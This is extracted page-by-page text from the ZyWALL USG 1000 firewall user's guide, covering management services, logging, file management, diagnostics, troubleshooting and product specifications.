Page 803: ...elect an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numb...

Page 804: ...in The ZyWALL allows you to configure address records about the ZyWALL itself or another device This way you can keep a record of DNS names and addresses that people on your network may use frequently If the ZyWALL receives a DNS query for an FQDN for which the ZyWALL has an address record the ZyWALL can send the IP address in a DNS response without having to query a DNS name server 50 6 4 PTR Rec...

Page 805: ...orwarder record Figure 510 Configuration System DNS Domain Zone Forwarder Add Table 231 Configuration System DNS Address PTR Record Edit LABEL DESCRIPTION FQDN Type a Fully Qualified Domain Name FQDN of a server An FQDN starts with a host name and continues all the way up to the top level domain name For example www zyxel com tw is a fully qualified domain name where www is the host zyxel is the t...

Page 806: ...fied DNS server s DNS Server Select DNS Server s from ISP if your ISP dynamically assigns DNS server information You also need to select an interface through which the ISP provides the DNS server IP address es The interface should be activated and set to be a DHCP client The fields below display the read only DNS server IP address es that the ISP assigns N A displays for any DNS server IP address ...

Page 807: ...ice Control table to add a service control rule Figure 512 Configuration System DNS Service Control Rule Add Table 233 Configuration System DNS MX Record Add LABEL DESCRIPTION Domain Name Enter the domain name where the mail is destined for IP Address FQDN Enter the IP address or Fully Qualified Domain Name FQDN of a mail server that handles the mail for the domain specified in the field above OK ...

Page 808: ...guration System DNS Service Control Rule Add LABEL DESCRIPTION Create new Object Use this to configure any new settings objects that you need to use in this screen Address Object Select ALL to allow or deny any computer to send DNS queries to the ZyWALL Select a predefined address object to just allow or deny the computer with the IP address that you specified to send DNS queries to the ZyWALL Zon...

Page 809: ...re is a lease timeout for administrators The ZyWALL automatically logs you out if the management session remains idle for longer than this timeout period The management session does not time out when a statistics screen is polling Each user is also forced to log in the ZyWALL for authentication again when the reauthentication time expires You can change the timeout settings in the User Group scree...

Page 810: ...ificates is optional and if selected means the HTTPS client must send the ZyWALL a certificate You must apply for a certificate for the browser from a CA that is a trusted CA on the ZyWALL Please refer to the following figure 1 HTTPS connection requests from an SSL aware web browser go to port 443 by default on the ZyWALL s web server 2 HTTP connection requests from a web browser go to port 80 by ...

Page 811: ...PN for example Figure 515 Configuration System WWW Service Control The following table describes the labels in this screen Table 235 Configuration System WWW Service Control LABEL DESCRIPTION HTTPS Enable Select the check box to allow or disallow the computer with the IP address that matches the IP address es in the Service Control table to access the ZyWALL Web Configurator using secure HTTPs con...

Page 812: ...HTTPS to log into the ZyWALL to log into SSL VPN for example You can also specify the IP addresses from which the users can access the ZyWALL Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click R...

Page 813: ...emove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This is the index number of the service control ru...

Page 814: ...Table 236 Configuration System Service Control Rule Edit LABEL DESCRIPTION Create new Object Use this to configure any new settings objects that you need to use in this screen Address Object Select ALL to allow or deny any computer to communicate with the ZyWALL using this service Select a predefined address object to just allow or deny the computer with the IP address that you specified to access...

Page 815: ...e 815 also customize the page that displays after an access user logs into the Web Configurator to access network services like the Internet See Chapter 40 on page 699 for more on access user accounts Figure 517 Configuration System WWW Login Page ...

Page 816: ...he login and access pages Figure 518 Login Page Customization Figure 519 Access Page Customization You can specify colors in one of the following ways Logo Title Message Note Message Background last line of text color of all text Logo Title Message Note Message Window last line of text color of all text Background ...

Page 817: ...and file name of the logo graphic or click Browse to locate it Note Use a GIF JPG or PNG of 100 kilobytes or less Click Upload to transfer the specified graphic file from your computer to the ZyWALL Customized Login Page Use this section to set how the Web Configurator login screen looks Title Enter the title for the top of the screen Use up to 64 printable ASCII characters Spaces are allowed Titl...

Page 818: ...reen in Internet Explorer Select Yes to proceed to the Web Configurator login screen if you select No then Web Configurator access is blocked Figure 520 Security Alert Dialog Box Internet Explorer Note Message Enter a note to display below the title Use up to 64 printable ASCII characters Spaces are allowed Window Background Set how the window s background looks To use a graphic select Picture and...

Page 819: ...tificate is from the ZyWALL If Accept this certificate temporarily for this session is selected then click OK to continue in Netscape Select Accept this certificate permanently to import the ZyWALL s certificate into the SSL client Figure 521 Security Certificate 1 Netscape Figure 522 Security Certificate 2 Netscape 50 7 7 3 Avoiding Browser Warning Messages Here are the main reasons your browser ...

Page 820: ...tes issued by a certificate authority import the certificate authority s certificate into your operating system as a trusted certificate Refer to Appendix D on page 987 for details 50 7 7 4 Login Screen After you accept the certificate the ZyWALL login screen appears The lock displayed in the bottom of the browser status bar denotes a secure connection Figure 523 Login Screen Internet Explorer 50 ...

Page 821: ...d CA Screen The CA sends you a package containing the CA s trusted certificate s your personal certificate s and a password to install the personal certificate s 50 7 7 5 1 Installing the CA s Certificate 1 Double click the CA s trusted certificate to produce a screen similar to the one shown next Figure 525 CA Certificate Example 2 Click Install Certificate and follow the wizard as shown earlier ...

Page 822: ...Double click the personal certificate given to you by the CA to produce a screen similar to the one shown next 1 Click Next to begin the wizard Figure 526 Personal Certificate Import Wizard 1 2 The file name and path of the certificate you double clicked should automatically appear in the File name text box Click Browse if you wish to import a different certificate Figure 527 Personal Certificate ...

Page 823: ... you by the CA Figure 528 Personal Certificate Import Wizard 3 4 Have the wizard determine where the certificate should be saved on your computer or select Place all certificates in the following store and choose a different location Figure 529 Personal Certificate Import Wizard 4 ...

Page 824: ...u should see the following screen when the certificate is correctly installed on your computer Figure 531 Personal Certificate Import Wizard 6 50 7 7 6 Using a Certificate When Accessing the ZyWALL Example Use the following procedure to access the ZyWALL via HTTPS 1 Enter https ZyWALL IP Address in your browser s web address field Figure 532 Access the ZyWALL Via HTTPS ...

Page 825: ...yWALL This screen displays even if you only have a single certificate as in the example Figure 533 SSL Client Authentication 3 You next see the Web Configurator login screen Figure 534 Secure Web Configurator Login Screen 50 8 SSH You can use SSH Secure SHell to securely access the ZyWALL s command line interface Specify which zones allow SSH access and from which IP address the access can come ...

Page 826: ...AN Example 50 8 1 How SSH Works The following figure is an example of how a secure connection is established between two remote hosts using SSH v1 Figure 536 How SSH v1 Works Example 1 Host Identification The SSH client sends a connection request to the SSH server The server identifies itself with a host key The client encrypts a randomly generated session key with the host key and server key and ...

Page 827: ... 50 8 2 SSH Implementation on the ZyWALL Your ZyWALL supports SSH versions 1 and 2 using RSA authentication and four encryption methods AES 3DES Archfour and Blowfish The SSH server is implemented on the ZyWALL for management using port 22 by default 50 8 3 Requirements for Using SSH You must install an SSH client program on a client computer Windows or Linux operating system that is used to conne...

Page 828: ... needed however you must use the same port number in order to use that service for remote management Server Certificate Select the certificate whose corresponding private key is to be used to identify the ZyWALL for SSH connections You must have certificates already configured in the My Certificates screen Click My Certificates and see Chapter 46 on page 749 for details Service Control This specif...

Page 829: ...e the host key in you computer Click Yes to continue Figure 538 SSH Example 1 Store Host Key Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This the index number of the service control rule Zone This is the zone on the ZyWALL the u...

Page 830: ...L using SSH version 1 If this is the first time you are connecting to the ZyWALL using SSH a message displays prompting you to save the host information of the ZyWALL Type yes and press ENTER Then enter the password to log in to the ZyWALL Figure 540 SSH Example 2 Log in 3 The CLI screen displays next 50 9 Telnet You can use Telnet to access the ZyWALL s command line interface Specify which zones ...

Page 831: ...rt number for a service if needed however you must use the same port number in order to use that service for remote management Service Control This specifies from which computers you can access which ZyWALL zones Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Refer to Table 236 on page 814 for details on the screen that opens Edit ...

Page 832: ...on configurable default policy The ZyWALL applies this to traffic that does not match any other configured rule It is not an editable rule To apply other behavior configure a rule that traffic will match so the ZyWALL will not have to use the default policy Zone This is the zone on the ZyWALL the user is allowed or denied to access Address This is the object name of the IP address es with which th...

Page 833: ... if needed however you must use the same port number in order to use that service for remote management Server Certificate Select the certificate whose corresponding private key is to be used to identify the ZyWALL for FTP connections You must have certificates already configured in the My Certificates screen Click My Certificates and see Chapter 46 on page 749 for details Service Control This spe...

Page 834: ...th a hyphen instead of a number is the ZyWALL s non configurable default policy The ZyWALL applies this to traffic that does not match any other configured rule It is not an editable rule To apply other behavior configure a rule that traffic will match so the ZyWALL will not have to use the default policy Zone This is the zone on the ZyWALL the user is allowed or denied to access Address This is t...

Page 835: ...twork management functions It executes applications that control and monitor managed devices The managed devices contain object variables managed objects that define each piece of information to be collected about a device Examples of variables include such as number of packets received node port status etc A Management Information Base MIB is a collection of managed objects SNMP allows a manager ...

Page 836: ...al throughput The focus of the MIBs is to let administrators collect statistical data and monitor status and performance You can download the ZyWALL s MIBs from www zyxel com 50 11 2 SNMP Traps The ZyWALL will send traps to the SNMP manager when any one of the following events occurs 50 11 3 Configuring SNMP To change your ZyWALL s SNMP settings click Configuration System SNMP tab The screen appea...

Page 837: ...mber for a service if needed however you must use the same port number in order to use that service for remote management Get Community Enter the Get Community which is the password for the incoming Get and GetNext requests from the management station The default is public and allows all requests Set Community Enter the Set community which is the password for incoming Set requests from the managem...

Page 838: ...select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This the index number of the ...

Page 839: ...nt connections Figure 545 Configuration System Dial in Mgmt The following table describes the labels in this screen Table 243 Configuration System Dial in Mgmt LABEL DESCRIPTION Show Advance Settings Hide Advance Settings Click this button to display a greater or lesser number of configuration fields Dial in Server Properties Click Advanced to display more configuration fields and edit the details...

Page 840: ... notifying the Vantage CNM administrator Port Speed Use the drop down list box to select the speed of the connection between the ZyWALL s auxiliary port and the external modem Available speeds are 9600 19200 38400 57600 or 115200 bps Initial String Type the AT command string that the ZyWALL returns to the external serial modem connected to the ZyWALL s auxiliary port during connection initializati...

Page 841: ...ntage CNM Click Advanced to display more configuration fields or click Basic to display fewer fields Enable Select this check box to allow Vantage CNM to manage your ZyWALL Server IP Address FQDN Enter the IP address or fully qualified domain name of the Vantage server If the Vantage CNM server is on a different subnet to the ZyWALL and is behind a NAT router enter the WAN IP address of the NAT ro...

Page 842: ...ustom in the Device Management IP field Keepalive Interval Set how often the ZyWALL sends a keep alive packet to the Vantage CNM server if there is no other traffic The keep alive packets maintain the Vantage CNM server s control session Periodic Inform Interval Select this option to have the ZyWALL periodically send Inform messages to the Vantage CNM server HTTPS Authentication When you are using...

Page 843: ...onfiguration System Language The following table describes the labels in this screen Table 245 Configuration System Language LABEL DESCRIPTION Language Setting Select a display language for the ZyWALL s Web Configurator screens You also need to open a new browser session to display the screens in the new language Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return...

Page 844: ...Chapter 50 System ZyWALL USG 1000 User s Guide 844 ...

Page 845: ...re and how to send daily reports and what reports to send Use the Maintenance Log Setting screens Section 51 3 on page 847 to specify settings for recording log messages e mailing them and sending them to a remote server 51 2 Email Daily Report Use the Email Daily Report screen to start or stop data collection and view various statistics about traffic passing through your ZyWALL Note Data collecti...

Page 846: ...1000 User s Guide 846 Click Configuration Log Report Email Daily Report to display the following screen Configure this screen to have the ZyWALL e mail you system statistics every day Figure 548 Configuration Log Report Email Daily Report ...

Page 847: ...yWALL s system date and time to the subject Mail From Type the e mail address from which the outgoing e mail is delivered This address is used in replies Mail To Type the e mail address or addresses to which the outgoing e mail is delivered SMTP Authentication Select this check box if it is necessary to provide a user name and password to the SMTP server User Name This box is effective when you se...

Page 848: ...ngs tab controls which events generate alerts and where alerts are e mailed The Log Settings Summary screen provides a summary of all the settings You can use the Log Settings Edit screen to maintain the detailed settings such as log categories e mail addresses server names etc for any log Alternatively if you want to edit what events is included in each log you can also use the Active Log Summary...

Page 849: ...ivate To turn off an entry select it and click Inactivate This field is a sequential value and it is not associated with a specific log Name This field displays the type of log setting entry system log logs stored on a USB storage device connected to the ZyWALL or one of the remote servers Log Format This field displays the format of the log Internal system log you can view the log on the View Log...

Page 850: ...Chapter 51 Log and Report ZyWALL USG 1000 User s Guide 850 Figure 550 Configuration Log Report Log Setting Edit System Log ...

Page 851: ... day of the week the log is e mailed Time for Sending Log This field is available if the log is e mailed weekly or daily Select the time of day hours and minutes when the log is e mailed Use 24 hour notation SMTP Authentication Select this check box if it is necessary to provide a user name and password to the SMTP server User Name This box is effective when you select the SMTP Authentication chec...

Page 852: ...gory fields in the View Log tab The Default category includes debugging messages generated by open source software System log Select which events you want to log by Log Category There are three choices disable all logs red X do not log any information from this category enable normal logs green check mark create log messages and alerts from this category enable normal logs and debug logs yellow ch...

Page 853: ...hen multiple log messages were aggregated Log Consolidation Interval Type how often in seconds to consolidate log information If the same log message appears multiple times it is aggregated into one log message with the text count x where x is the number of original log messages appended at the end of the Message field OK Click this to save your changes and return to the previous screen Cancel Cli...

Page 854: ...ing The Edit Log on USB Storage Setting screen controls the detailed settings for saving logs to a connected USB storage device Go to the Log Setting Summary screen see Section 51 3 1 on page 848 and click the USB storage Edit icon Figure 551 Configuration Log Report Log Setting Edit USB Storage ...

Page 855: ...e normal logs and debug logs yellow check mark send the remote server log messages alerts and debugging information for all log categories This field is a sequential value and it is not associated with a specific entry Log Category This field displays each category of messages The Default category includes debugging messages generated by open source software Selection Select what information you w...

Page 856: ... Log Settings The Log Settings Edit screen controls the detailed settings for each log in the remote server syslog Go to the Log Settings Summary screen see Section 51 3 1 on page 848 and click a remote server Edit icon Figure 552 Configuration Log Report Log Setting Edit Remote Server ...

Page 857: ...or all of the log categories disable all logs red X do not send the remote server logs for any log category enable normal logs green check mark send the remote server log messages and alerts for all log categories enable normal logs and debug logs yellow check mark send the remote server log messages alerts and debugging information for all log categories This field is a sequential value and it is...

Page 858: ...where and how often log information is e mailed or remote server names To access this screen go to the Log Settings Summary screen see Section 51 3 1 on page 848 and click the Active Log Summary button Figure 553 Active Log Summary This screen provides a different view and a different way of indicating which messages are included in each log and each alert Please see Section 51 3 2 on page 849 whe...

Page 859: ...ion for any category to a connected USB storage device enable normal logs green check mark create log messages and alerts for all categories and save them to a connected USB storage device enable normal logs and debug logs yellow check mark create log messages alerts and debugging information for all categories and save them to a connected USB storage device E mail Server 1 Use the E Mail Server 1...

Page 860: ...y the ZyWALL does not e mail debugging information however even if this setting is selected E mail Server 1 E mail Select whether each category of events should be included in the log messages when it is e mailed green check mark and or in alerts red exclamation point for the e mail settings specified in E Mail Server 1 The ZyWALL does not e mail debugging information even if it is recorded in the...

Page 861: ...Chapter 51 Log and Report ZyWALL USG 1000 User s Guide 861 ...

Page 862: ...Chapter 51 Log and Report ZyWALL USG 1000 User s Guide 862 ...

Page 863: ...the Configuration File screen see Section 52 2 on page 866 to store and name configuration files You can also download configuration files from the ZyWALL to your computer and upload configuration files from your computer to the ZyWALL Use the Firmware Package screen see Section 52 3 on page 870 to check your current firmware version and upload firmware to the ZyWALL Use the Shell Script screen se...

Page 864: ... Configuration File Shell Script Example enter configuration mode configure terminal change administrator password username admin password 4321 user type admin configure ge3 interface ge3 ip address 172 23 37 240 255 255 255 0 ip gateway 172 23 37 254 metric 1 exit create address objects for remote management to ZyWALL firewall rules use the address group in case we want to open up remote manageme...

Page 865: ...onfiguration file or run a shell script the ZyWALL processes the file line by line The ZyWALL checks the first line and applies the line if no errors are detected Then it continues with the next line If the ZyWALL finds an error it stops applying the configuration file or shell script and generates a log You can change the way a configuration file or shell script is applied Include setenv stop on ...

Page 866: ... and back on the ZyWALL uses the system default conf configuration file with the ZyWALL s default settings If there is a startup config conf the ZyWALL checks it for errors and applies it If there are no errors the ZyWALL uses it and copies it to the lastgood conf configuration file as a back up file If there is an error the ZyWALL generates a log and copies the startup config conf configuration f...

Page 867: ...ance File Manager Configuration File Rename Specify the new name for the configuration file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Remove Click a configuration file s row to select it and click Remove to delete it from the ZyWALL You can only delete manually saved configur...

Page 868: ...Copy to open the Copy File screen Figure 557 Maintenance File Manager Configuration File Copy Specify a name for the duplicate configuration file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Table 253 Maintenance File Manager Configuration File continued LABEL DESCRIPTION ...

Page 869: ...this gets the ZyWALL started with a fully valid configuration file as quickly as possible Ignore errors and finish applying the configuration file this applies the valid parts of the configuration file and generates error logs for all of the configuration file s errors This lets the ZyWALL apply most of your configuration and you can refer to the logs for what to fix Ignore errors and finish apply...

Page 870: ...t recently used valid configuration file that was saved when the device last restarted If you upload and apply a configuration file with an error you can apply lastgood conf to return to a valid configuration Size This column displays the size in KB of a configuration file Last Modified This column displays the date and time that the individual configuration files were last changed or saved Upload...

Page 871: ...not be decompressed option while you download the firmware package See Section 33 2 1 on page 559 for more on the anti virus Destroy compressed files that could not be decompressed option The firmware update can take up to five minutes Do not turn off or reset the ZyWALL while the firmware update is in progress Figure 559 Maintenance File Manager Firmware Package The following table describes the ...

Page 872: ... After five minutes log in again and check your new firmware version in the HOME screen If the upload was not successful the following message appears in the status bar at the bottom of the screen Figure 562 Firmware Upload Error 52 4 The Shell Script Screen Use shell script files to have the ZyWALL use commands that you specify Use a text editor to create the shell script files They must use a zy...

Page 873: ...k a shell script s row to select it and click Rename to open the Rename File screen Figure 564 Maintenance File Manager Shell Script Rename Specify the new name for the shell script file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Remove Click a shell script file s row to selec...

Page 874: ...ed to wait awhile for the ZyWALL to finish applying the commands This column displays the number for each shell script file entry File Name This column displays the label that identifies a shell script file Size This column displays the size in KB of a shell script file Last Modified This column displays the date and time that the individual shell script files were last changed or saved Upload She...

Page 875: ...through the ZyWALL Use the Maintenance Diagnostics Core Dump screens see Section 53 4 on page 882 to have the ZyWALL save a process s core dump to an attached USB storage device if the process terminates abnormally crashes so you can send the file to customer support for troubleshooting Use the Maintenance Diagnostics System Log screens see Section 53 5 on page 883 to download files of system logs...

Page 876: ...ubleshooting Figure 567 Maintenance Diagnostics Files Table 256 Maintenance Diagnostics LABEL DESCRIPTION Filename This is the name of the most recently created diagnostic file Last modified This is the date and time that the last diagnostic file was created The format is yyyy mm dd hh mm ss Size This is the size of the most recently created diagnostic file Copy the diagnostic file to USB storage ...

Page 877: ...N Remove Select files and click Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each file entry The total number of files that you can save depends on the file sizes and the ava...

Page 878: ...rrow button to move them to the Capture Interfaces list Use the Shift and or Ctrl key to select multiple objects IP Type Select the protocol of traffic for which to capture packets Select any to capture packets for all types of traffic Host IP Select a host IP address object for which to capture packets Select any to capture packets for all hosts Select User Defined to be able to enter an IP addre...

Page 879: ...0 The ZyWALL stops the capture and generates the capture file when either the file reaches this size or the time period specified in the Duration field expires Split threshold Specify a maximum size limit in megabytes for individual packet capture files After a packet capture file reaches this size the ZyWALL starts another packet capture file Duration Set a time limit in seconds for the capture T...

Page 880: ...ALL s throughput or performance may be affected while a packet capture is in progress After the ZyWALL finishes the capture it saves a separate capture file for each selected interface The total number of packet capture files that you can save depends on the file sizes and the available flash storage space Once the flash storage space is full adding more packet captures will fail Stop Click this b...

Page 881: ...as set to 1500 bytes Figure 570 Packet Capture File Example This column displays the number for each packet capture file entry The total number of packet capture files that you can save depends on the file sizes and the available flash storage space File Name This column displays the label that identifies the file The file name format is interface name file suffix cap Size This column displays the...

Page 882: ...e following table describes the labels in this screen 53 4 1 Core Dump Files Screen Click Maintenance Diagnostics Core Dump Files to open the core dump files screen This screen lists the core dump files stored on the ZyWALL or a Table 260 Maintenance Diagnostics Core Dump LABEL DESCRIPTION Save core dump to USB storage if ready Select this to have the ZyWALL save a process s core dump to an attach...

Page 883: ...les LABEL DESCRIPTION Remove Select files and click Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each packet capture file entry The total number of packet capture files that ...

Page 884: ...ck Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each file entry The total number of files that you can save depends on the file sizes and the available storage space File Nam...

Page 885: ...command to save the configuration before you reboot Otherwise the changes are lost when you reboot Reboot is different to reset see Section 56 1 on page 906 reset returns the device to its default configuration 54 2 The Reboot Screen The Reboot screen is part of the Web configurator so that remote users can restart the device To access this screen click Maintenance Reboot Figure 574 Maintenance Re...

Page 886: ...Chapter 54 Reboot ZyWALL USG 1000 User s Guide 886 ...

Page 887: ...ZyWALL or remove the power Not doing so can cause the firmware to become corrupt 55 1 1 What You Need To Know Shutdown writes all cached data to the local storage and stops the system processes 55 2 The Shutdown Screen To access this screen click Maintenance Shutdown Figure 575 Maintenance Shutdown Click the Shutdown button to shut down the ZyWALL Wait for the device to shut down before you manual...

Page 888: ...Chapter 55 Shutdown ZyWALL USG 1000 User s Guide 888 ...

Page 889: ...ontact your local vendor Cannot access the ZyWALL from the LAN Check the cable connection between the ZyWALL and your computer or switch Ping the ZyWALL from a LAN computer Make sure your computer s Ethernet card is installed and functioning properly Also make sure that its IP address is in the same subnet as the ZyWALL s In the computer click Start All Programs Accessories and then Command Prompt...

Page 890: ... more noticeable with a large browser window You can try shrinking the browser window if this is an issue I cannot access the Internet Check the ZyWALL s connection to the Ethernet jack with Internet access Make sure the Internet gateway device such as a DSL modem is working properly Check the WAN interface s status in the Dashboard Use the installation setup wizard again and make sure that you en...

Page 891: ...em for certain interfaces Many security settings are usually applied to zones Make sure you assign the interfaces to the appropriate zones When you create an interface there is no security applied on it until you assign it to a zone The ZyWALL is not applying the custom policy route I configured The ZyWALL checks the policy routes in the order that they are listed So make sure that your custom pol...

Page 892: ...face You cannot set up a PPP interface virtual Ethernet interface or virtual VLAN interface if the underlying interface is a member of a bridge You also cannot add an Ethernet interface or VLAN interface to a bridge if the member interface has a virtual interface or PPP interface on top of it My rules and settings that apply to a particular interface no longer work The interface s IP address may h...

Page 893: ...igure a particular VLAN interface on top of an Ethernet interface even though I have it configured it on top of another Ethernet interface Each VLAN interface is created on top of only one Ethernet interface I cannot get the auxiliary port to connect to my phone line You have to connect an external modem to the ZyWALL s auxiliary port to use the auxiliary interface The ZyWALL is not applying an in...

Page 894: ... was matched still goes through Since the ZyWALL erases the infected portion of the file before sending it you may not be able to open the file The ZyWALL is not scanning some zipped files The ZyWALL cannot unzip password protected ZIP files or a ZIP file within another ZIP file There are also limits to the number of ZIP files that the ZyWALL can concurrently unzip The ZyWALL is deleting some zipp...

Page 895: ...named custom rules then all custom signatures on the ZyWALL are overwritten with the new file If this is not your intention make sure that the files you import are not named custom rules I cannot configure some items in IDP that I can configure in Snort Not all Snort functionality is supported in the ZyWALL The ZyWALL s performance seems slower after configuring ADP Depending on your network topol...

Page 896: ...ALL You may need to configure the DDNS entry s IP Address setting to Auto if the interface has a dynamic IP address or there are one or more NAT routers between the ZyWALL and the DDNS server The ZyWALL may not determine the proper IP address if there is an HTTP proxy server between the ZyWALL and the DDNS server I cannot create a second HTTP redirect rule for an incoming interface You can configu...

Page 897: ...IPSec tunnel does not build properly the problem is likely a configuration error at one of the IPSec routers Log into both ZyXEL IPSec routers and check the settings in each field methodically and slowly Make sure both the ZyWALL and remote IPSec router have the same security settings for the VPN tunnel It may help to display the settings for both routers side by side Here are some general suggest...

Page 898: ...IP protocol 50 The ZyWALL supports UDP port 500 and UDP port 4500 for NAT traversal If you enable this make sure the To ZyWALL firewall rules allow UDP port 4500 too Make sure regular firewall rules allow traffic between the VPN tunnel and the rest of the network Regular firewall rules check packets the ZyWALL sends before the ZyWALL encrypts them and check packets the ZyWALL receives after the Zy...

Page 899: ...ons using the new settings I cannot get my VPN concentrator configuration to work Turn off policy enforcement in the member VPN connections Make sure your firewall rules are not blocking the VPN packets If the USG ZyWALLs VPN tunnels are members of a single zone make sure it is not set to block intra zone traffic The VPN connection is up but VPN traffic cannot be transmitted through the VPN tunnel...

Page 900: ...rver No warning message is displayed I cannot download the ZyWALL s firmware package The ZyWALL s firmware package cannot go through the ZyWALL when you enable the anti virus Destroy compressed files that could not be decompressed option The ZyWALL classifies the firmware package as not being able to be decompressed and deletes it You can upload the firmware package to the ZyWALL with the option e...

Page 901: ...policy for the application The ZyWALL examines these first eight packets to identify the application I configured policy routes to manage the bandwidth of TCP and UDP traffic but the bandwidth management is not being applied properly It is recommended to use application patrol instead of policy routes to manage the bandwidth of TCP and UDP traffic Device HA is not working You may need to disable S...

Page 902: ...y reactivate the bridge interfaces I cannot get the RADIUS server to authenticate the ZyWALL s default admin account The default admin account is always authenticated locally regardless of the authentication method setting See Chapter 44 on page 733 for more information about authentication methods The ZyWALL fails to authentication the ext user user accounts I configured An external server such a...

Page 903: ...up ZyWALLs to the same services The schedule I configured is not being applied at the configured times Make sure the ZyWALL s current date and time are correct I cannot get a certificate to import into the ZyWALL 1 For My Certificates you can import a certificate that matches a corresponding certification request that was generated by the ZyWALL You can also import a certificate in PKCS 12 format ...

Page 904: ...ate passwords Exporting a PKCS 12 file creates this and you must provide it to decrypt the contents when you import the file into the ZyWALL Note Be careful not to convert a binary file to text during the transfer process It is easy for this to occur since many programs use text files by default My file sharing SSL application object does not work Make sure you configure the shared folder on the f...

Page 905: ...as a comment Your configuration files or shell scripts can use exit or a command line consisting of a single to have the ZyWALL exit sub command mode Include write commands in your scripts Otherwise the changes will be lost when the ZyWALL restarts You could use multiple write commands in a long script Note exit or must follow sub commands if it is to make the ZyWALL exit sub command mode See Chap...

Page 906: ...ny method try restarting it by turning the power off and then on again If you still cannot access the ZyWALL by any method or you forget the administrator password s you can reset the ZyWALL to its factory default settings Any configuration files or shell scripts that you saved on the ZyWALL should still be available afterwards Use the following procedure to reset the ZyWALL to its factory default...

Page 907: ...Chapter 56 Troubleshooting ZyWALL USG 1000 User s Guide 907 56 2 Getting More Troubleshooting Help Search for support information for your model at www zyxel com for more troubleshooting suggestions ...

Page 908: ...Chapter 56 Troubleshooting ZyWALL USG 1000 User s Guide 908 ...

Page 909: ...ons FEATURE SPECIFICATION Number of MAC addresses 5 Ethernet Interfaces Number of Ethernet interfaces 5 All Ethernet interfaces are Gigabit Ethernet full duplex RJ 45 connectors auto negotiation auto MDI MDIX auto crossover Management interface RS 232 DB9F connector AUX port RS 232 DB9M connector USB Slots 2 2 0 plug and play Compatible USB Cards 3G Huawei E220 E270 E160 E169 E800 and E180 HDD Slo...

Page 910: ... 5 5 5 Flash Size 256 256 256 DRAM Size 1024 1024 1024 INTERFACE VLAN 32 32 128 Virtual alias 4 per interface 4 per interface 4 per interface PPP system default NA NA 5 PPP user created 12 12 12 Bridge 12 12 12 ROUTING Static Routes 256 256 256 Policy Routes 5 000 5 000 5 000 Sessions 200 000 512 000 512 000 ARP Table Size 1024 1024 1024 MAC Table Size For Bridge Mode only 8K 8K 8K NAT NAT Entries...

Page 911: ...000 Maximum address object in one group 128 128 128 Service Objects 5000 5000 5000 Service Groups 1000 1000 1000 Maximum service object in one group 128 128 128 Schedule Objects 512 512 512 ISP Accounts 128 128 128 Maximum Number of LDAP Groups 16 16 16 Maximum Number of LDAP Servers for Each LDAP Group 4 4 4 Maximum Number of RADIUS Groups 16 16 16 Maximum Number of RADIUS Servers for Each RADIUS...

Page 912: ...Pool 2048 2048 2048 Maximum Number of DDNS Profiles 10 10 10 DHCP Relay 2 per interface 2 per interface 2 per interface CENTRALIZED LOG Log Entries 512 512 512 Debug Log Entries 1024 1024 1024 Admin E mail Addresses 2 2 2 Syslog Servers 4 4 4 IDP Maximum Number of IDP Profiles 8 8 8 Custom Signatures 256 256 256 Maximum Number of IDP Rules 32 32 32 ADP Maximum Number of ADP Profiles 8 8 8 Maximum ...

Page 913: ...mum Number of White List Entries 512 512 512 Maximum Number of Black List Entries 512 512 512 Maximum Number of DNSBLs 5 5 5 Maximum Number of Anti Spam Statistics 500 500 500 Maximum Anti Spam Statistics Ranking 10 10 10 ANTI VIRUS Maximum Number of Concurrent ZIP File Decompression Sessions 100 ZIP files 16 RAR LZSS or 2 RAR PPM 100 ZIP files 16 RAR LZSS or 2 RAR PPM 100 ZIP files 16 RAR LZSS or...

Page 914: ...te RFCs 1058 2082 2453 2328 3101 3137 Telnet server RFCs 1408 1572 SSH server RFCs 4250 4251 4252 4253 4254 Built in service DNS server RFCs 1034 1035 1123 1183 1535 1536 1706 1712 1750 1876 1982 1995 1996 2136 2163 2181 2230 2308 2535 2536 2537 2538 2539 2671 2672 2673 2782 3007 3090 Built in service DHCP server RFCs 1542 2131 2132 2485 2489 Built in service HTTP server RFCs 1945 2616 2965 2732 2...

Page 915: ...onnector end of the card into the slot Note Do not force bend or twist the card Used by Time service RFCs 3339 Used by Telnet service RFCs 318 854 1413 Used by SIP ALG RFCs 3261 3264 DHCP relay RFC 1541 ZySH W3C XML standard ARP RFC 826 IP IPv4 RFC 791 TCP RFC 793 Table 266 Standards Referenced by Features continued FEATURE STANDARDS REFERENCED ...

Page 916: ...Chapter 57 Product Specifications ZyWALL USG 1000 User s Guide 916 ...

Page 917: ...port to 80 The content filtering checking for unsafe web sites has been changed to use port 80 due to a configuration change Content filter has been changed zsb port to 23 The content filtering checking for unsafe web sites has been changed to use port 23 due to a configuration change Table 268 Forward Web Site Logs LOG MESSAGE DESCRIPTION s Trusted Web site The device allowed access to a web site...

